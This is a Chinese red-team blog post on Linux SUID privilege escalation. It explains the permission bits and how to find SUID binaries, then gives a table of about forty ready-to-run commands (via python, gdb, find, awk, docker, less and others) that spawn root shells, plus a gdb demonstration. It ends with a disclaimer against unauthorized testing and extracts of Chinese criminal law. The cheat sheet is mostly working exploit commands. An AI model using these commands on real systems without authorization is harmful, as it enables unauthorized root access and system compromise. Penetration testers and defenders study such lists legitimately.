红队笔记之Suid提权浅析与利用方法总结

SUID权限说明

众所周知，在 Linux 中一切都是一个文件，而文件的权限有rwx（即读/写/执行），所有者、所有组、其它用户的rwx权限是彼此独立的。

文件所有者和超级用户可以修改文件或目录的权限。可以使用绝对模式（八进制数字模式），符号模式指定文件的权限（chmod 754）。

其实在Linux的权限设置中还存在着除rwx，的第四类权限位，即；

SUID(Set UID)：

• suid权限仅对二进制程序有效（binary program）；
• 执行者对于该程序需要具有x的可执行权限；
• 本权限仅在执行该程序的过程中有效（run-time）；
• 执行者将具有该程序拥有者的权限。

SGID(Set SGID)：

• SGID对二进制文件有用；
• 程序执行者对该程序来说，具有x权限；
• 执行者在执行的过程中将获得该程序群组的权限；

Sticky Bit

• SBIT只针对目录有效；
• 除非目录的属主和root用户有权限删除它，除此之外其它用户不能删除和修改这个目录；

SUID也真实因为其特殊属性具备了可以被提权的属性，下文进行详细介绍。

如何给文件设置SUID属性

方法1：

# 将所有者的执行权限位被设置成s，即suid
chmod u+s file|directory(此为要查询的文件名)
# 命令说明
chmod WhoWhatWhich file|directory
	Who(代表身份): u,g,o,a (user, group, other, all)
	What(代表动作): +, -, = (add, remove, set exact)
	Which(代表访问级别): r, w, x,s,t (read, write, execute,SUID/SGID,Sticky )

方法2：

# 在4750中,4说明SUID位被设置,7为所有者读写执行权限,5为所有组的读执行权限，其他用户无任何权限。
chmod 4750 file|directory(此为要查询的文件名)
# 命令说明
chmod OneTwoThreeFour file|directory(此为要查询的文件名)
	One(特殊权限位)：当不设置时默认为0，SUID = 4，SGID = 2，Sticky = 1
	Two(所有者权限)：读权限加4，写权限加2，执行权限加1
	Three(所有组权限)：读权限加4，写权限加2，执行权限加1
	Four(其他用户权限)：读权限加4，写权限加2，执行权限加1

如何查看文件是否具有SUID属性

ls -al file(此为要查询的文件名)
# 如查看sudo文件的SUID属性
ls -al /usr/bin/sudo

SUID提权利用原理

上文讲到，SUID(Set User ID)是对二进制程序进行的一种特殊权限设置，可以让二进制程序的执行者临时拥有文件属主的权限，也正是因为这个特性，假设我们以非 root 用户身份访问目标系统，并且我们发现启用了 suid 位的二进制文件，那么这些文件/程序/命令可以以 root 权限运行。

SUID 提权利用步骤

1、查找具备Suid权限的文件

2、查找对应文件的利用方法（不是所有文件均可利用，需要结合时间成本考虑是否进行利用）

如何查找 SUID 文件

find / -perm -u=s -type f 2>/dev/null
参数：
	/表示从文件系统的顶部（根）开始，查找每个目录
	-perm表示搜索后面的权限
	-u=s表示查找 root 用户拥有的文件
	-type表示我们正在寻找的文件类型
	f 表示普通文件，而不是目录或特殊文件
	2表示到进程的第二个文件描述符，即 stderr（标准错误）
	>表示重定向
	/dev/null是一个特殊的文件系统对象，它会丢弃写入其中的所有内容。

常用指令提权方法

命令	利用方法
zsh	zsh
xargs	xargs -a /dev/null sh -p
watch	watch -x sh -c ‘reset; exec sh -p 1>&0 2>&0’
timeout	timeout 7d /bin/sh -p
time	time /bin/sh -p
tclsh	1、tclsh 2、exec /bin/sh -p <@stdin >@stdout 2>@stderr
taskset	taskset 1 /bin/sh -p
stdbuf	stdbuf -i0 /bin/sh -p
strace	strace -o /dev/null /bin/sh -p
ssh	ssh -o ProxyCommand=’;sh -p 0<&2 1>&2’ x
setarch	setarch $(arch) /bin/sh -p
rsync	rsync -e ‘sh -p -c “sh -p 0<&2 1>&2”’ 127.0.0.1:/dev/null
rpm	rpm --eval ‘%{lua:os.execute("/bin/sh -p")}’
python	python -c ‘import os; os.execl("/bin/sh", “sh”, “-p”)’
php	1、CMD="/bin/sh" 2、 php -r “pcntl_exec(’/bin/sh’, [’-p’]);”
nice	nice /bin/sh -p
nano	1、nano //运行nano程序 2、^R //按下ctrl-r 3、^X //按下ctrl-x 4、reset; sh -p 1>&0 2>&0 //输入下面的命令
more	1、more /etc/profile 2、!/bin/sh -p
logsave	logsave /dev/null /bin/sh -i -p
less	less /etc/profile //读取文件，在底行输入!/bin/sh -p
ksh	ksh -p
ip	1、ip netns add foo 2、ip netns exec foo /bin/sh -p 3、ip netns delete foo
ionice	ionice /bin/sh -p
git	git help status
gimp	gimp -idf --batch-interpreter=python-fu-eval -b ‘import os; os.execl("/bin/sh", “sh”, “-p”)’
gdb	gdb -nx -ex ‘python import os; os.execl("/bin/sh", “sh”, “-p”)’ -ex quit
ftp	ftp //在底行输入“!/bin/sh -p”
flock	flock -u / /bin/sh -p
find	find . -exec /bin/sh -p ; -quit
expect	expect -c ‘spawn /bin/sh -p;interact’
env	env /bin/sh -p
ed	ed //在底行输入“!/bin/sh -p”
docker	docker run -v /:/mnt --rm -it alpine chroot /mnt sh
dmesg	dmesg -H//在底行输入“!/bin/sh -p”
csh	csh -b
bash	bash -p
awk	awk ‘BEGIN {system("/bin/bash -p")}’
perl	perl exec “/bin/bash”;

SUID实战演示

1、使用查找当前用户可利用的具有SUID的属性的质量

find / -perm -u=s -type f 2>/dev/null

2、确定要用的指令(以gdb为例)，并输入利用指令

 gdb -nx -ex 'python import os; os.execl("/bin/sh", "sh", "-p")' -ex quit

本文只为技术交流。为了您和您家人的幸福，请不要利用文中技术在用户未授权情况下开展渗透测试！！！

《中华人民共和国刑法》

第二百八十五条
违反国家规定，侵入国家事务、国防建设、尖端科学技术领域的计算机信息系统的，处三年以下有期徒刑或者拘役。
第二百八十六条
违反国家规定，对计算机信息系统功能进行删除、修改、增加、干扰，造成计算机信息系统不能正常运行，后果严重的，处五年以下有期徒刑或者拘役；后果特别严重的，处五年以上有期徒刑。

违反国家规定，对计算机信息系统中存储、处理或者传输的数据和应用程序进行删除、修改、增加的操作，后果严重的，依照前款的规定处罚。
故意制作、传播计算机病毒等破坏程序，影响计算机系统正常运行，后果严重的，依照第一款的规定处罚